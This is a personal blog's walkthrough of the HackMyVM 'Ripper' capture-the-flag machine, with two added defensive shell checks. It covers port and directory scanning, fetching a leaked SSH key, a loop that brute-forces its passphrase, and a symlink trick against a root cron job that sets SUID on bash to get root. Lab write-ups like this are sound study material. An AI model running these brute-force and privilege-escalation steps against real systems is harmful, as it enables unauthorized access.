Windy's little blog

All the odds and ends of life, and I like CTF.

HackMyVm Ripper Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Ripper

Scan ports.

 nmap -sV -sC -p- 192.168.56.100  -oN ports.log
 ...
 PORT   STATE SERVICE VERSION            
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 ...
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Site doesn't have a title (text/html).
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


Scan port 80.

 gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 ===============================================================
 /index.html           (Status: 200) [Size: 57]
 /staff_statements.txt (Status: 200) [Size: 107]


Check staff_statements.txt. The mention of "old ssh connection files" suggests a leftover key backup such as id_rsa.bak.

 cat staff_statements.txt   
 The site is not yet repaired. Technicians are working on it by connecting with old ssh connection files.


Note that the VM's console screen shows us the username jack.

[screenshot: image-20210603115519124.png]


Download id_rsa.bak and try to connect over ssh; the key is passphrase-protected.

 wget http://192.168.56.100/id_rsa.bak
 2021-06-03 11:53:15 (126 MB/s) - ‘id_rsa.bak’ saved [1876/1876]
 
 ssh jack@192.168.56.100 -i id_rsa.bak
 Enter passphrase for key 'id_rsa.bak':


Use the following loop to brute force the passphrase.

 cat /usr/share/wordlists/rock_ascii.txt | while read pass; do if ssh-keygen -c -C "jack@192.168.56.100" -P "$pass" -f id_rsa.bak &>/dev/null; then echo "$pass"; break; fi; done
 bananas


Log in as jack. After some enumeration, nothing useful was found.

Download linpeas from GitHub and upload it to the VM.

 wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh


Run linpeas.sh; it reports a strange string.

 [+] Hashes inside passwd file? ........... No                                                                                        
 [+] Writable passwd file? ................ No
 [+] Credentials in fstab/mtab? ........... No
 [+] Can I read shadow files? ............. No
 [+] Can I read opasswd file? ............. jack:Il0V3lipt0n1c3t3a
 [+] Can I write in network-scripts? ...... No
 [+] Can I read root folder? .............. No


This is the password of another user, helder.

Download pspy64 from GitHub (https://github.com/DominicBreuker/pspy), upload it to the VM, and watch the system processes.

 2021/06/02 08:22:01 CMD: UID=0    PID=1205   | /usr/sbin/CRON -f 
 2021/06/02 08:22:01 CMD: UID=0    PID=1206   | /usr/sbin/CRON -f
 2021/06/02 08:22:01 CMD: UID=0    PID=1207   | /bin/sh -c nc -vv -q 1 localhost 10000 > /root/.local/out && if [ "$(cat /root/.local/helder.txt)" = "$(cat /home/helder/passwd.txt)" ] ; then chmod +s "/usr/bin/$(cat /root/.local/out)" ; fi
 


The shell command means: if the contents of /root/.local/helder.txt equal the contents of /home/helder/passwd.txt, then whatever string (say XXX) is received on port 10000 is used as a binary name, and the system sets the SUID bit on /usr/bin/XXX.

So we create a symbolic link from passwd.txt to /root/.local/helder.txt (the cron job runs as root, so it follows the link and compares the file with itself) and send the string "bash" to port 10000. After a minute, /usr/bin/bash has the SUID bit set.
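The hardened form of that cron comparison, as an added example that is not the box's own script: the job should refuse symlinks, compare the two files byte for byte, and accept only an explicit allowlist of binary names instead of whatever arrives on port 10000. Paths and the allowlist are passed as function arguments (an assumption made so the check runs anywhere), and the whole thing is written as POSIX sh functions that return 0 only when the grant would be permitted.

```shell
#!/bin/sh
# Added example: a hardened stand-in for the Ripper cron job's comparison.
# Assumption: the caller supplies the secret path, the candidate path, the
# requested binary name, and then the allowlist of names that may get SUID.

# True only for a regular file reached without following a symlink.
# The -L test must come first: -f alone follows the link and would pass.
regular_file_not_symlink() {
    [ ! -L "$1" ] && [ -f "$1" ]
}

# True when $1 exactly matches one of the remaining arguments (the allowlist).
name_allowed() {
    want="$1"; shift
    for n in "$@"; do
        [ "$n" = "$want" ] && return 0
    done
    return 1
}

# check_grant SECRET CANDIDATE NAME ALLOWED...
# Returns 0 when every rule holds: neither file is a symlink, the name is on the
# allowlist, and the two files are byte-identical (cmp, not cat-and-compare).
check_grant() {
    secret="$1"; candidate="$2"; name="$3"
    shift 3
    regular_file_not_symlink "$secret"    || return 1
    regular_file_not_symlink "$candidate" || return 1
    name_allowed "$name" "$@"             || return 1
    cmp -s "$secret" "$candidate"
}
```

With these rules the symlink trick in the walkthrough fails at the first check, and a name such as "bash" is rejected before any comparison happens, so the SUID grant is never reached.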

 helder@ripper:~$ ln -s /root/.local/helder.txt ./passwd.txt
 helder@ripper:~$ echo bash | nc -nlvp 10000
 listening on [any] 10000 ...
 connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 43374
 helder@ripper:~$ ls -la /usr/bin/bash
 -rwsr-sr-x 1 root root 1168776 Apr 18  2019 /usr/bin/bash


Finally, we get root.

 helder@ripper:~$ /usr/bin/bash -p
 helder@ripper:~$ id
 uid=1001(helder) gid=1001(helder) euid=0(root) egid=0(root) groups=0(root),1001(helder)
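A defender's counterpart to the last step, added here and not part of the original post: the visible outcome of this chain is a new root-owned SUID binary, which a periodic comparison of setuid/setgid files against a saved baseline catches. Both functions are POSIX sh; the baseline file is assumed to have been produced earlier by list_setid on the same host, and the scan root is an argument so the check can be exercised on any directory.

```shell
#!/bin/sh
# Added example: detect setuid/setgid files that were not present in a baseline.
# Assumption: the baseline is a sorted list of paths written by list_setid earlier.

# Print every setuid or setgid regular file under the given root, sorted,
# staying on one filesystem so network or pseudo mounts are not walked.
list_setid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort
}

# new_setid_since ROOT BASELINE
# Print paths that carry a setuid/setgid bit now but are absent from BASELINE.
# Returns 0 when nothing new was found, 1 when at least one new entry exists,
# so it can drive an alert from cron or a monitoring agent.
new_setid_since() {
    root="$1"; baseline="$2"
    added=$(list_setid "$root" | comm -13 "$baseline" -)
    [ -z "$added" ] && return 0
    printf '%s\n' "$added"
    return 1
}
```

Typical use is `list_setid / > /var/lib/setid.baseline` once after installation, then `new_setid_since / /var/lib/setid.baseline` on a schedule; on Ripper the second call would have reported /usr/bin/bash the minute the cron job ran.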

